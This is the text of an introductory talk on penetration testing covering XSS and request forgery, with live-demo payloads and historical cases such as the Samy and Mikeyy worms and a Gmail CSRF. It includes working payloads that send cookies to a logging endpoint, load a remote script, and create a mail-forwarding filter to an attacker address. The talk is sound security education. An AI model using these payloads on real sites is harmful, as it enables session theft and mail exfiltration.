AMIT DHAKAD

Application Developer

Is considered a “survivor”

Likes To Read About Black Magic & Illusions

What, why and how’s of

Penetration Testing

- Amit DhakadDeveloper

What do I plan to cover?

What is Penetration Testing?

XSS What is it? Types of XSS

Reflective XSS Stored XSS

Request Forgery What is it? Types of Request Forgery

On-site request forgery Cross-site request forgery

Demo Attack mechanisms

Real world examples

Why do we need to pay attention?

Penetration TestingSimulating a malicious attack on a

system

Cross-site scripting (XSS)Injecting javascript through user-

controllable fields

Reflective XSSInjecting javascript using url

parameters

Diagram courtesy : The Web Application Hacker’s Handbook

Attack:

http://localhost:3000/pure-reflective-xss?query=title"onclick="window.location.href=('http://localhost:3000/log?message='%2Bdocument.cookie)

Stored XSSExploiting server’s ability to persist

Diagram courtesy : The Web Application Hacker’s Handbook

Attack:

Image url is set to

http://www.myflorida.org.uk/images/disney_gif/Donald.gif"onmouseover="window.location.href=('http://localhost:3000/log?message='+document.cookie)

Request ForgeryPerform unwitting actions on behalf of

the user

On-site Request Forgery (OSRF)From same domain

Attack with XSS:

Image url is set to

http://www.myflorida.org.uk/images/disney_gif/Donald.gif“ onmouseover="var form=document.getElementById('new_bid'); form.bid_amount.value=100;form.submit();

Attack without XSS:

Image url is set to

/bids?bid[amount]=500&bid[auction_id]=1

Cross-site Request Forgery (CSRF)

From a different domain

Same origin policy A page residing on one domain can cause an arbitrary

request to be made to another domain, but it cannot itself process the data returned from that request.

A page residing on one domain can load a script from another domain and execute this within its own context.

What can you do with XSS and Request Forgery?

Session hijacking

Performing arbitrary actions

Disclosure of user data

Real world attacks

MySpace worm by Samy (XSS + OSRF)

Bypassed all filters and added a script to his profile

The script did two things: Added the visiting user as a friend The script got copied into the user’s profile Anyone visiting the new infected user also got added as Samy’s

friend.

• Protection:• MySpace strips out the word "onreadystatechange" which is

necessary for XML-HTTP requests

• Attack:• eval('xmlhttp.onread' + 'ystatechange = callback');

Ebay – discovered by Dave Armstrong (OSRF)

Crafted url set as image url

Arbitrary bid was placed on behalf of the visiting user

Mikeyy twitter worm (XSS + OSRF)

Implemented by a 17-year old boy

"><title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script>

-- "<script src="http://www.stalkdaily.com/ajax.js"></script>"

Visiting user got infected

Infected users began twitting unwittingly.

Gmail vulnerability – discovered by Petko Petkov (CSRF)

http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter

Add filter to forward all emails to the attacker’s email address

Why we need to pay attention?

Shift is towards attacking clients

Technologies don’t provide strong protection

Considered as lame attacks

Identification using automated tools is difficult

Penetration testing is considered as a separate vertical

Break your own walls before anyone else does it

Q & A

Thank you